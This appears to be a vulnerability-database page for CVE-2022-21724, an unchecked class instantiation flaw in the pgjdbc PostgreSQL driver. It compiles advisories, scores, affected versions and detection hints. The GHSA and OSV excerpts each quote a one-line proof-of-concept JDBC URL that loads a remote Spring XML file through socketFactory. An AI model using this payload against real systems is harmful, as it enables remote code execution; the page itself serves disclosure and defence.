CVE-2022-21724
published 2022-02-02CVE-2022-21724: pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system…
PriorityP260critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
3.01%
85.7th percentile
pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | libpgjava | < libpgjava 42.3.2-1 (bookworm) | libpgjava 42.3.2-1 (bookworm) |
| fedoraproject | fedora | — | — |
| postgresql | postgresql_jdbc_driver | < 42.2.25 | 42.2.25 |
| postgresql | postgresql_jdbc_driver | — | — |
| postgresql | postgresql_jdbc_driver | >= 42.3.0 < 42.3.2 | 42.3.2 |
| quarkus | quarkus | < 2.7.2 | 2.7.2 |
Detection & IOCsextracted from sources · hover to see the quote
- →Attacker-controlled JDBC connection property `authenticationPluginClassName` can be used to instantiate arbitrary classes without interface verification, enabling code execution ↗
- →Monitor JDBC URL or connection properties for attacker-supplied class names in any of the five vulnerable properties: authenticationPluginClassName, sslhostnameverifier, socketFactory, sslfactory, sslpasswordcallback ↗
- →Exploitation scope is local; focus detection on local process/application-level manipulation of JDBC connection strings or configuration files supplying plugin class names ↗
- ·Upstream re-scored this issue and it is no longer considered a full RCE; rated Moderate by Red Hat. Detection priority should be adjusted accordingly. ↗
- ·Fixed in pgjdbc 42.3.2 (Debian sid/bookworm/trixie/forky) and 42.2.15-1+deb11u1 (Debian bullseye); environments still running older versions remain vulnerable ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vendor_debian7.0HIGH
vendor_redhat7.0HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
CVE-2022-21724: pgjdbc is the offical PostgreSQL JDBC Driver
osv·2022-02-02·CVSS 9.8
CVE-2022-21724 [CRITICAL] CVE-2022-21724: pgjdbc is the offical PostgreSQL JDBC Driver
pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.
GHSA
pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
ghsa·2022-02-02
CVE-2022-21724 [HIGH] CWE-665 pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
### Impact
pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.
However, the driver did not verify if the class implements the expected interface before instantiating the class.
Here's an example attack using an out-of-the-box class from Spring Framework:
```
DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");
```
The first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property)
OSV
pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
osv·2022-02-02
CVE-2022-21724 [HIGH] pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
### Impact
pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.
However, the driver did not verify if the class implements the expected interface before instantiating the class.
Here's an example attack using an out-of-the-box class from Spring Framework:
```
DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");
```
The first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property)
Red Hat
jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes
vendor_redhat·2022-02-01·CVSS 7.0
CVE-2022-21724 [HIGH] CWE-665 jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes
jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes
pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.
Debian
CVE-2022-21724: libpgjava - pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the j...
vendor_debian·2022·CVSS 7.0
CVE-2022-21724 [HIGH] CVE-2022-21724: libpgjava - pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the j...
pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.
Scope: local
bookworm: resolved (fixed in 42.3.2-1)
bullseye: resolved (fixed
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4https://lists.debian.org/debian-lts-announce/2022/05/msg00027.htmlhttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS/https://security.netapp.com/advisory/ntap-20220311-0005/https://www.debian.org/security/2022/dsa-5196https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4https://lists.debian.org/debian-lts-announce/2022/05/msg00027.htmlhttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS/https://security.netapp.com/advisory/ntap-20220311-0005/https://www.debian.org/security/2022/dsa-5196
2022-02-02
Published